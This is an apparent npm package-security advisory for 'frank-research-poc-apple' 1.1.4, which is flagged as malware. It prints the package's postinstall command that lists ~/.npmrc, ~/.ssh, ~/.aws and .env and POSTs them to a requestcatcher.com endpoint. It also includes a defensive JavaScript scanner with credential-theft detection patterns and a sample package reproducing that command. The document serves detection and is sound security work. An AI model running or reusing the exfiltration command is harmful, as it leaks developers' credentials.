frank-research-poc-apple @1.1.4
Risk Dispositions (3 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason |
|---|---|---|---|---|
| install-script:postinstall | install-scripts | reject | AI | AI (install-scripts): Postinstall exfiltrates npm credentials to an attacker-controlled server; malicious across all versions of this package. |
| bogus-package | bogus-package | reject | AI | AI (bogus-package): All spam/bogus signals confirmed; package is a throwaway malware vehicle. |
| semgrep:child-process-import | semgrep | reject | AI | AI (semgrep): child_process used in confirmed malware context; generalizes to this package. |
SAST Findings (3)
## Source: ossf-package-analysis (7f21864e3fd8ae5f8a1fe5a450428e5cd85f5b8b9bbfccb98c1fc6000a283982)

The OpenSSF Package Analysis project identified 'frank-research-poc-apple' @ 1.1.4 (npm) as malicious. It is considered malicious because:

- The package executes one or more commands associated with malicious behavior.

Script, as captured (the Indonesian string 'Kredensial Tersedia' means 'Available Credentials'; the `-F` argument appears to have been mangled by the page's email-obfuscation filter and is reproduced as shown):

```sh
echo 'Target: ' $(hostname) > info.txt && echo 'User: ' $(whoami) >> info.txt && echo '--- Kredensial Tersedia ---' >> info.txt && ls -la ~/.npmrc ~/.ssh ~/.aws .env 2>/dev/null >> info.txt && curl -X POST -F "[email protected]" https://franki.requestcatcher.com/test
```

What runs at install time: the hostname and the installing user are written to `info.txt`, followed by an `ls -la` listing of `~/.npmrc`, `~/.ssh`, `~/.aws` and `.env` (errors for missing paths are silenced with `2>/dev/null`), and the file is then POSTed to the `franki` subdomain of requestcatcher.com, a public request-inspection service. Note that this version ships directory-listing metadata (names, sizes, permissions) of the credential files, not their contents; swapping `ls -la` for `cat` in a later release would ship the contents themselves, which is why the dispositions above treat the package as credential exfiltration across all versions rather than judging this one script in isolation.
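The install-script finding above can be reproduced with a small static check over `package.json`. The following is an added example written for this page, not code from the advisory, from OpenSSF Package Analysis, or from the package itself. It scans only the lifecycle hooks npm runs automatically, looks for the three signals the captured script combines (credential-file references, host fingerprinting, an outbound upload), and derives a verdict plus the upload destinations. Both `package.json` objects are constructed inline; the malicious one mirrors the script shown above, and its `file=` form-field name is an assumption because the page shows that argument mangled.

```javascript
// Added example, not tooling from the advisory page or from OpenSSF Package
// Analysis: a static check for npm lifecycle scripts with the exfiltration
// shape reported above. It never executes the scripts it inspects.
'use strict';

// npm lifecycle hooks that run automatically on install/publish.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare',
  'prepublish', 'prepublishOnly', 'postpublish'];

const URL_RE = /https?:\/\/[^\s"')]+/g;

const RULES = [
  // 1. credential files read or listed (~/.npmrc, ~/.ssh, ~/.aws, .env, ...)
  { id: 'credential-paths',
    re: /(?:~|\$HOME)\/\.(?:npmrc|ssh|aws|gnupg|git-credentials|docker)\b|(?<![\w.])\.env\b/g },
  // 2. host/user fingerprinting
  { id: 'host-fingerprint', re: /\b(?:hostname|whoami|uname|ifconfig)\b/g },
  // 3. outbound upload: curl/wget with a POST/form/data flag followed by a URL
  { id: 'outbound-upload',
    re: /\b(?:curl|wget)\b[^|;&]*?(?:-X\s*POST|-F\b|-d\b|--data\S*|--upload-file|--post-data|--post-file)[^|;&]*?https?:\/\/[^\s"')]+/g },
];

// Run every rule over one script body; evidence is the de-duplicated matches.
function scanScript(hook, body) {
  const findings = [];
  for (const rule of RULES) {
    const hits = body.match(rule.re);
    if (hits) findings.push({ hook, rule: rule.id, evidence: [...new Set(hits)] });
  }
  return findings;
}

// Scan only hooks npm runs on its own; "test"/"build" are out of scope because
// they do not execute on `npm install`.
function scanPackage(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE) {
    if (typeof scripts[hook] === 'string') findings.push(...scanScript(hook, scripts[hook]));
  }
  return findings;
}

// Credential paths plus an upload in the same package is the exfiltration
// shape; either alone deserves review; fingerprinting alone is low signal.
function riskVerdict(findings) {
  const ids = new Set(findings.map((f) => f.rule));
  if (ids.has('credential-paths') && ids.has('outbound-upload')) return 'CRITICAL';
  if (ids.has('credential-paths') || ids.has('outbound-upload')) return 'HIGH';
  return ids.size ? 'LOW' : 'NONE';
}

// Destinations matched by the upload rule, for blocking and hunting.
function exfilTargets(findings) {
  const urls = new Set();
  for (const f of findings) {
    if (f.rule !== 'outbound-upload') continue;
    for (const ev of f.evidence) for (const u of ev.match(URL_RE) || []) urls.add(u);
  }
  return [...urls];
}

// Constructed sample mirroring the postinstall reported above. The form-field
// name "file" is an assumption; the page shows that argument mangled.
const SAMPLE_MALICIOUS = {
  name: 'frank-research-poc-apple', version: '1.1.4',
  scripts: {
    postinstall:
      "echo 'Target: ' $(hostname) > info.txt && echo 'User: ' $(whoami) >> info.txt && " +
      "echo '--- Kredensial Tersedia ---' >> info.txt && " +
      'ls -la ~/.npmrc ~/.ssh ~/.aws .env 2>/dev/null >> info.txt && ' +
      'curl -X POST -F "file=@info.txt" https://franki.requestcatcher.com/test',
  },
};

// Constructed benign control: a build step in postinstall, plus a curl POST in
// a non-lifecycle script that the scanner must ignore (hypothetical URL).
const SAMPLE_BENIGN = {
  name: 'example-lib', version: '1.0.0',
  scripts: { postinstall: 'node scripts/build.js',
             test: 'curl -X POST -d "{}" https://ci.example.test/report' },
};

for (const pkg of [SAMPLE_MALICIOUS, SAMPLE_BENIGN]) {
  const findings = scanPackage(pkg);
  console.log(`${pkg.name}@${pkg.version}: ${riskVerdict(findings)}`,
    exfilTargets(findings), JSON.stringify(findings));
}
```

The regexes are deliberately narrow (a shell pipeline that builds the URL from variables, or a `node -e` one-liner, will slip past them), so treat a NONE verdict as "nothing obvious" rather than "clean". For prevention rather than triage, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops this class of postinstall from running at all, at the cost of breaking packages that legitimately build native code on install.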
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 84. Findings: 1 critical (+40), 1 high (+25), 1 medium (+10), 3 low (+9).
Published to npm: